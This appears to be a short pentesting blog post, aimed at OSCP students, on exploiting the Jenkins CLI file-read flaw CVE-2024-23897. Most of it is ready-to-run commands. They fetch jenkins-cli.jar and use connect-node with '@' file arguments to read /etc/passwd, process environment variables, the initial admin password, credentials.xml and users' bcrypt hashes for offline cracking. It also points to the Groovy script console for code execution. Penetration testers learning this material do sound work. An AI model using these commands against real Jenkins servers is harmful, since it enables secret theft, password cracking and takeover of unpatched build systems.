Notes From the Field: Hacking Jenkins CVE-2024–23897

rootsecdev
3 min readFeb 19, 2024

Jenkins is a highly sought after environment because of wide spread implications on its attack surface, especially if the target installation hasn’t been updated. Its also a favorite of the PEN-200 (OSCP). It’s important to know exploitation vectors of Jenkins such as default passwords that may be in use, and knowing how to exploit using groovy scripts for initial access.

This post will dive into how to read arbitrary files from a Jenkins server running on linux and recover encrypted bcrypt hashed passwords for offline cracking.

So what is CVE-2024–23897 and how can I leverage it for exploitation?

The interesting part is the way this vulnerability will process CLI commands when using the built in command line interface. The use of “@” is extremely important.

On Jenkins installation you can pull the command line interface Java utility from the target server using the following command:

wget <ip>:<port>/jnlpJars/jenkins-cli.jar

Once you have the cli client downloaded this syntaxt in the CLI is what we will be using alot.

java -jar jenkins-cli.jar -s <jenkins_url> <command>

Some useful commands I for directory searches and hunting of secrets:

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/secrets/initilAdminPassword

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/etc/passwd

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/proc/self/environ

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/users.xml

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/<user_folder>/config.xml

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/credentials.xml

Examples of useful commands in action:

Finding jenkins users

Dumping bcrypt hashes from user folder

Once you are inside a Jenkins box you can execute some groovy scripts by going directly into the script console. If you want to go there directly you can do this:

<web_url>:<port>/script

This will take you too a groovy console as shown below:

So medium is being slightly weird and will not let me post groovy scripts in this post so I made a public gist instead. It can be found here:

https://gist.github.com/rootsecdev/273f22a747753e2b17a2fd19c248c4b7

--

--